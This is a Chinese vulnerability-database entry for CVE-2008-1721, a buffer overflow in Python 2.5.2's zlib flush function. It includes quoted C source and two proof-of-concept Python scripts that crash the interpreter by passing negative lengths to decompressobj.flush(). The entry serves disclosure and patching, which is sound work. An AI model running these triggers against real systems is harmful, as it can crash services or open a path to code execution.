Python zlib模块远程溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114969 漏洞类型 数字错误
发布时间 2008-04-09 更新时间 2009-03-18
CVE编号 CVE-2008-1721 CNNVD-ID CNNVD-200804-140
漏洞平台 Unix CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/31634
https://cxsecurity.com/issue/WLB-2008040014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200804-140
|漏洞详情
Python是一种开放源代码的脚本编程语言。Python的zlib扩展模块中用于flush解压流的方式获取一个输入参数来确定应flush多少数据。这个参数是一个有符型整数,没有经过过滤检查,因此如果传送了负值的话就会导致错误的内存分配,然后有符型整数会被转换为无符整数,触发缓冲区溢出。Python-2.5.2/Modules/zlibmodule.c:761PyDoc_STRVAR(decomp_flush__doc__,762"flush([length])--Returnastringcontaininganyremaining\n"763"decompresseddata.length,ifgiven,istheinitialsizeofthe\n"764"outputbuffer.\n"765"\n"766"Thedecompressorobjectcannolongerbeusedafterthiscall.");767768staticPyObject*769PyZlib_unflush(compobject*self,PyObject*args)770{771interr,length=DEFAULTALLOC;772PyObject*retval=NULL;773unsignedlongstart_total_out;774775if(!PyArg_ParseTuple(args,"|i:flush",&length))776returnNULL;777if(!(retval=PyString_FromStringAndSize(NULL,length)))778returnNULL;779780781ENTER_ZLIB782783start_total_out=self->zst.total_out;784self->zst.avail_out=length;785self->zst.next_out=(Byte*)PyString_AS_STRING(retval);786787Py_BEGIN_ALLOW_THREADS788err=inflate(&(self->zst),Z_FINISH);789Py_END_ALLOW_THREADSPyArg_ParseTuple()函数为Python和C之间的转换方式,如果提供了的话就会初始化长度变
|漏洞EXP
source: http://www.securityfocus.com/bid/28715/info

Python zlib module is prone to a remote buffer-overflow vulnerability because the library fails to properly sanitize user-supplied data.

An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition.

This issue affects Python 2.5.2; other versions may also be vulnerable. 

python-2.5.2-zlib-unflush-misallocation.py
------------------------------------------
#!/usr/bin/python

import zlib

msg = """
Desire to know why, and how, curiosity; such as is in no living creature
        but man:
so that man is distinguished, not only by his reason, but also by this
        singular passion
from other animals; in whom the appetite of food, and other pleasures of
        sense, by
predominance, take away the care of knowing causes; which is a lust of
        the mind,
that by a perseverance of delight in the continual and indefatigable
generation of knowledge, exceedeth the short vehemence of any carnal
        pleasure.
"""

compMsg = zlib.compress(msg)
bad = -24
decompObj = zlib.decompressobj()
decompObj.decompress(compMsg)
decompObj.flush(bad)

	
python-2.5.2-zlib-unflush-signedness.py:
----------------------------------------
#!/usr/bin/python

import zlib

msg = """
Society in every state is a blessing, but government even in its best
        state is but a necessary evil
in its worst state an intolerable one; for when we suffer, or are
        exposed to the same miseries by a
government, which we might expect in a country without government, our
        calamities is heightened by
reflecting that we furnish the means by which we suffer! Government,
        like dress, is the badge of
lost innocence; the palaces of kings are built on the ruins of the
        bowers of paradise. For were
the impulses of conscience clear, uniform, and irresistibly obeyed, man
        would need no other
lawgiver; but that not being the case, he finds it necessary to
        surrender up a part of his property
to furnish means for the protection of the rest; and this he is induced
        to do by the same prudence which
in every other case advises him out of two evils to choose the least.
        Wherefore, security being the true
design and end of government, it unanswerably follows that whatever form
        thereof appears most likely to
ensure it to us, with the least expense and greatest benefit, is
        preferable to all others.
""" * 1024

compMsg = zlib.compress(msg)
bad = -2
decompObj = zlib.decompressobj()
decompObj.decompress(compMsg, 1)
decompObj.flush(bad)
|参考资料

来源:XF
名称:zlib-pystringfromstringandsize-bo(41748)
链接:http://xforce.iss.net/xforce/xfdb/41748
来源:UBUNTU
名称:USN-632-1
链接:http://www.ubuntu.com/usn/usn-632-1
来源:BID
名称:28715
链接:http://www.securityfocus.com/bid/28715
来源:BUGTRAQ
名称:20080409IOActiveSecurityAdvisory:BufferoverflowinPythonzlibextensionmodule
链接:http://www.securityfocus.com/archive/1/archive/1/490690/100/0/threaded
来源:DEBIAN
名称:DSA-1620
链接:http://www.debian.org/security/2008/dsa-1620
来源:support.apple.com
链接:http://support.apple.com/kb/HT3438
来源:SLACKWARE
名称:SSA:2008-217-01
链接:http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.525289
来源:GENTOO
名称:GLSA-200807-01
链接:http://security.gentoo.org/glsa/glsa-200807-01.xml
来源:SECUNIA
名称:33937
链接:http://secunia.com/advisories/33937
来源:SECUNIA
名称:31365
链接:http://secunia.com/advisories/31365
来源:SECUNIA
名称:31358
链接:http://secunia.com/advisories/31358
来源:SECUNIA
名称:31255
链接:http://secunia.com/advisories/31255
来源:SECUNIA
名称:30872
链接:http://secunia.com/ad